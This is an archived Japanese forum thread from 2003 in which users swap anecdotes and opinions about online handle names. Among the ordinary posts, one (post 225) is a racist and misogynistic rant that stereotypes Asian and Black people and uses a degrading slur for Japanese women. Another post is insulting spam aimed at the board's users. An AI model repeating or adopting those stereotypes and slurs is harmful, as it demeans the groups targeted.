ハンドルネームは、作っているサイトの内容によって変わってこない?
アダルトサイトだと、ハンドルネーム使わないと知人に発見される
かもしれないから恥ずかしいね。
逆に、法律とか、政治のサイトを運営しているなら、
本名でやったほうが、友達に発見されたりして友達に自慢できるよね。

199 :Name_Not_Found:03/01/05 16:11 ID:???
>>197
ドラえもんかよ

200 :Name_Not_Found:03/01/09 18:14 ID:???
ノリでつけたHN。
一応一般名詞としても使えるもので、冷静になって見かえすと結構イタイ。

すぐ変えれると思ってつけて気がついたら身内やネット知人内ですっかり定着。
今更変えても混乱するだけだよなあ…とか考えると変えられないが、
オフ会とかで手前のHN連呼されたら…と思うといてもたってもいられなくなる。

201 :Name_Not_Found:03/01/09 21:20 ID:???
>>200
エリマキトカゲさん、お久しぶりです。

202 :Name_Not_Found:03/01/15 01:16 ID:???
岡田克彦ファンクラブからのご案内です。ご高承のとおり、岡田克彦氏の卒業した早稲田大学政治経済学部
と、ひろゆきの卒業した中央大学文学部は比較にならないほど差があります。中央大学文学部のような
ヘボい大学に共通しているのは、文化水準が低いという事です。18歳から22歳をヘボい大学で過ごすという
ことは、感受性において致命傷と言えます。2ちゃんねらーの大半は岡田克彦氏に比べて、著しい低学歴で
頭が悪いだけでなく、感受性も愚鈍で腐っているという、取り返しのつかない状態なのです。
せめて、http://www.geocities.co.jp/MusicHall-Horn/1091/で、岡田氏の作品に触れましょう。



203 :山崎渉:03/01/23 03:05 ID:???
(^^)

204 :Name_Not_Found:03/03/16 20:20 ID:8UcDDx1o
大手のチャットに行って交流図ったら、
大御所とHNが同じだから変えろと言われた。
変える気は全然ないけどなんかその態度に凹んだ。

205 :Name_Not_Found:03/03/16 22:56 ID:???
○○ママ、って名乗るやつはトラブルメーカーが多い。
○○が子供の名前だったりするのは一番危険。
子供が何人もいると、○○▼▼ママ、って人数分でつけてるし。

おまぬけママ、とか
どすこいママ、とか自分を揶揄った○○ママは微笑ましいが・・・

206 :Name_Not_Found:03/03/16 23:19 ID:???
とほほママ

207 :Name_Not_Found:03/03/16 23:29 ID:???
ぶさいくママ
おとぼけママ

まさか自分で美人ママ、なんて名乗るヤシ、いるのかな?
でも美人妻同盟、ってあるからな(藁

208 :Name_Not_Found:03/03/17 16:15 ID:???
昔のライブネーム使ってた。
ただ救いがあるのは愛、とか羅、とか小難しい漢字を使用していないことだけ。

サイトでも定着してたんだけど、もう恥ずかしすぎて本名に変えた。
痛い過去を拭い去れなかった典型的な例。

209 :Name_Not_Found:03/03/18 01:09 ID:???
>>208
うお!塩紺舞さんじゃないですか!お久しぶりです。
ラストライブ覚えてますよ。「君の乾杯になりたい」。

210 :Name_Not_Found:03/03/19 10:05 ID:???
読み方まったくわからん漢字一文字だけってやつはなんかいやだ。
尤とか楫とか畝とか婁とか


211 :Name_Not_Found:03/03/19 18:50 ID:???
>>210
ぜんぶよめません。。

212 :山崎渉:03/04/17 15:53 ID:???
(^^)

213 :山崎渉:03/04/20 04:03 ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

214 :Name_Not_Found:03/05/25 22:23 ID:???
カタカナや漢字とかでの何かのキャラの丸パクりHNや、
勘違いナルシスト入ってるような漢字のHNは確かにウザいよな。

215 :Name_Not_Found:03/05/25 23:50 ID:???
麗爛

216 :Name_Not_Found:03/05/26 14:23 ID:???
昔、検索すると沢山ヒットするHNだったので、
後ろに閣下をつけてみました。

217 :Name_Not_Found:03/05/27 13:26 ID:???
ひろゆき閣下

218 :Name_Not_Found:03/05/27 13:28 ID:???
ひろゆき  55,800 件
http://www.google.com/search?num=50&hl=en&inlang=ja&ie=Shift_JIS&q=%82%D0%82%EB%82%E4%82%AB&lr=lang_ja

ひろゆき閣下  4 件
http://www.google.com/search?num=50&hl=en&ie=Shift_JIS&q=%82%D0%82%EB%82%E4%82%AB%8At%89%BA&lr=lang_ja

219 :山崎渉:03/05/28 13:23 ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

220 :Name_Not_Found:03/06/03 14:18 ID:???
自分のHNでググッたら凄まじく痛いサイトが先頭に。

221 :Name_Not_Found:03/06/04 23:14 ID:???
サイト開設一年半。HN変えたいんだけど、途中で変えるのってイタイかな…

222 :Name_Not_Found:03/06/29 14:20 ID:???
自分じゃないけど、版権イラ用とオリジナル用とジャンルごとにPNを使い分けてる管理人を見たことある。


223 :Name_Not_Found:03/07/11 16:40 ID:???
age

224 :山崎 渉:03/07/15 09:47 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

225 :なまえをいれてください:03/07/19 22:23 ID:???
ハッキリ言ってアメリカなどの多民族国家では黒人の方がアジア人よりもずっと立場は上だよ。
貧弱で弱弱しく、アグレッシブさに欠け、醜いアジア人は黒人のストレス解消のいい的。
黒人は有名スポーツ選手、ミュージシャンを多数輩出してるし、アジア人はかなり彼らに見下されている。
(黒人は白人には頭があがらないため日系料理天などの日本人店員相手に威張り散らしてストレス解消する。
また、日本女はすぐヤラせてくれる肉便器としてとおっている。
「○ドルでどうだ?(俺を買え)」と逆売春を持ちかける黒人男性も多い。)
彼らの見ていないところでこそこそ陰口しか叩けない日本人は滑稽。

226 :Name_Not_Found:03/07/29 00:42 ID:???
人名風のHNを使ってるんだけど、下の名前を平仮名に改名した。
それでぐぐったら、某俳優がヒット。
某俳優の下の名前の漢字が難しい字なので、平仮名で書く奴が多いせいだった。

227 :Name_Not_Found:03/07/29 00:50 ID:???
>>226
もうちょいヒントを。

228 :Name_Not_Found:03/07/30 00:33 ID:???
俺は昔、某無料サービスが自動生成したパスワードをHNにしてる。
ヘンな文字列なんだけど、口に出してみると語感がよくてさ

229 :Name_Not_Found:03/07/31 22:55 ID:???
>>228
パス漏れしないか?

230 :Name_Not_Found:03/07/31 23:01 ID:???
>>229
その無料サービス自体があぼんしてるから大丈夫、だと思う

231 :山崎 渉:03/08/02 02:48 ID:???
(^^)

232 :ltu ◆9NZwXpTRTw :03/08/11 02:00 ID:???
「っ」を「ltu」と表記し消防時代のアダ名をローマ字で使ってる。
最後が「kun」だしちょっと痛いかも・・・。

233 :ltu ◆9NZwXpTRTw :03/08/11 02:03 ID:???
やっぱりageとく。

>>232
ちなみに人に言えないようなトコ以外は常に。

234 :Name_Not_Found:03/08/11 03:30 ID:???
>>232
安心しろ、かなり痛いから。

235 :235:03/08/11 05:49 ID:???
私は↓これ読んでHN捨てました。

ttp://cruel.org/freeware/hacker.html より抜粋
 最後に、次のようなことはしてはいけません。
・つまらないおおげさな ID やハンドルを使わない。
ハンドル名にまつわる問題については、もうちょっと詳しく書いておきましょうか。
ハンドルの陰にアイデンティティを隠すのは、クラッカーや、warez d00dz や、
他の下等な生の形態に特徴的な、子どもじみた愚かな行動です。
ハッカーはこんなことはしません。かれらは自分たちがやることに誇りを持っていて、
それに本名で関わろうとします。
だからもしあなたがハンドルを持っているのなら、それをお捨てなさい。
ハッカー文化において、それはあなたにとって敗者の印にしかならないでしょう。

236 :Name_Not_Found:03/08/11 06:22 ID:???
>>235
気が向いたのでマジレスしておくと、
「HN使うのはダサいからやめとけ」って言われてそうすることは、
(彼の言うように)誰にも何も言われずに慣習的にHNを名乗るのと同じくダサい。
そのドキュメントを読んで、自分の現状と慣習を考えて、
名乗る必要がないと考えて名乗らないんならともかく。

それをきっかけにしたというのならともかく、
盲信してるんだったらそのドキュメントを読んだ意味はないと思われ。

237 :Name_Not_Found:03/08/11 18:52 ID:???
2ちゃん系だと、トリップをそのままHNにしてる人がけっこういるね。


238 :Name_Not_Found:03/08/13 05:56 ID:MByG/zRo
>>237
コテハンにあったトリップを探した、じゃなくて?

あ、でもトリップからも名前は考えられるよなー。

239 :Name_Not_Found:03/08/13 06:15 ID:???
オンラインでHN命名頼まれてつけたげたんだけど、
オフで会ったとき呼ぶのが恥ずかしかったので、始終「あなた」と呼んでしまった。

240 :山崎 渉:03/08/15 15:33 ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

241 :Name_Not_Found:03/08/15 18:12 ID:???
アニヲタ系管理人にありがちなHN

1.名字付き
主に如月、水無月、葉月など、月の名前が何か多い

2.ビジュアル系風味の漢字
瑠璃、羅、雫、磨、硝、等がお気に入り(ザッと検索してみたら恐ろしい遭遇率だった

俺、ゲーム攻略のサイトやってた時一回オフ会したけど
耽美なHNの女の子が…実物が('A`)アウアウア

242 :Name_Not_Found:03/08/16 16:56 ID:???
俺のリアル友人達

a)本名を逆さに読んだものがそのままHN
 最初見たときは「なんじゃこりゃ、漢字も>>241みたいなのだし響きもアレだし、ヲタ色全開だな」と思うも
 その仕組みに気付いたときには思わず納得。
 ちなみに漏れはまるで名前っぽくもならず、単なる逆さ読みにしかなり得ないような本名_| ̄|○

b)本名の誤変換が由来
 本名の下の名前の誤変換で「○△」という漢字二字が出てきたようで
 その二字をそのままHNの苗字・名前の頭文字にそれぞれ使っている(△山○夫、みたいに)
 これも一見>>241系のヲタHNっぽい響きだったんだけど、気づいてみたらああなるほどっておもた
 ちなみに漏れは誤変換のしようがない本名_| ̄|○

243 :Name_Not_Found:03/08/17 15:40 ID:???
>>242の本名は彦一

244 :lsu:03/08/17 20:12 ID:Mht1Du0U
>>242
おぉ。感心した。
>>243
(藁)

僕はたまーに本名並べ変えて使ってます。
同名さんいぱーい

245 :Name_Not_Found:03/08/18 23:58 ID:???
漢字を選べば苗字でも名前(女)でも通用する語句をひらがなで使用。
ハチ公前で大声で呼ばれたって恥ずかしくない。
リア友でもHNで呼ぶのがいるので、本名だと思われてることあり。
・・・でも諸事情により捨てる。でも捨てきれなくて、新HNは旧HNに数字を当てた
(例:はなこ=875)ものにしてしまった。

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)